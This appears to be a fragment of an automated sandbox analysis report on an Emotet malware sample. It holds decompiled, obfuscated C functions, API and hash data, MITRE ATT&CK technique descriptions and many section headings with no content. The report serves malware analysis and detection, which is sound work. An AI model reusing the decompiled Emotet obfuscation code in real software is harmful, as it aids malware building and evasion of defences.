				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E007BE399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x007b910a
0x007b910c
0x007b910d
0x007b910e
0x007b9111
0x007b9114
0x007b9117
0x007b911a
0x007b911d
0x007b9120
0x007b9123
0x007b9126
0x007b9127
0x007b912a
0x007b912d
0x007b9130
0x007b9133
0x007b9134
0x007b9137
0x007b9138
0x007b9139
0x007b913a
0x007b913f
0x007b9149
0x007b914c
0x007b9153
0x007b915a
0x007b9161
0x007b9168
0x007b916f
0x007b9176
0x007b918e
0x007b9191
0x007b9198
0x007b919f
0x007b91a6
0x007b91ad
0x007b91b4
0x007b91bb
0x007b91c2
0x007b91d5
0x007b91ef
0x007b91f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 007B91EF

Strings

31, xrefs: 007B919F

Memory Dump Source

Source File: 0000000C.00000002.770145294.00000000007A0000.00000040.00000010.sdmp, Offset: 007A0000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: c9e2319f49fb1bd6ada3ac1710ada3a11636ab2e03b988723871c6bd93a91fa8
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 8B31C272801259BBCF559FA6CD49CDFBFB5FB89714F108158FA2462120C3768A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007B0207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E007B0207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E007A8002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E007BE399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x007b020f
0x007b0212
0x007b0214
0x007b0217
0x007b021a
0x007b021d
0x007b021f
0x007b0224
0x007b0232
0x007b0235
0x007b0238
0x007b0239
0x007b023a
0x007b0246
0x007b0247
0x007b024c
0x007b0250
0x007b0257
0x007b025e
0x007b0265
0x007b0269
0x007b0270
0x007b0277
0x007b0285
0x007b028a
0x007b0291
0x007b0298
0x007b029f
0x007b02a9
0x007b02af
0x007b02b2
0x007b02d5
0x007b02e1
0x007b02e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 007B02E1

Strings

(Gt, xrefs: 007B025E

Memory Dump Source

Source File: 0000000C.00000002.770145294.00000000007A0000.00000040.00000010.sdmp, Offset: 007A0000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: b503c03124c569718ae9a8810f1fbdd307d5d766087248ae761820d8f1621901
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: 372166B5E00208FBEF04DFA4CC0A9DEBBB2FB44314F108199E525AB250D7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 007AF3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E007AF3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E007BE399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x007af3fd
0x007af403
0x007af407
0x007af40e
0x007af415
0x007af422
0x007af423
0x007af429
0x007af42c
0x007af433
0x007af43a
0x007af441
0x007af448
0x007af44f
0x007af456
0x007af45d
0x007af464
0x007af46b
0x007af479
0x007af47c
0x007af495
0x007af49f

APIs

ExitProcess.KERNEL32(00000000), ref: 007AF49F

Memory Dump Source

Source File: 0000000C.00000002.770145294.00000000007A0000.00000040.00000010.sdmp, Offset: 007A0000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: 2a791240b8d111c54d8c1afad11c3698ce44c0d35374b3d629586f3c04b1e320
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 651106B1E1021DEBDF04DFE4C94A6EEBBB4FB14315F108188E521AB240E7B85B548F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 6zAcNlJXo7

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Function 00BCED95, Relevance: 9.1, Strings: 7, Instructions: 364
COMMONCrypto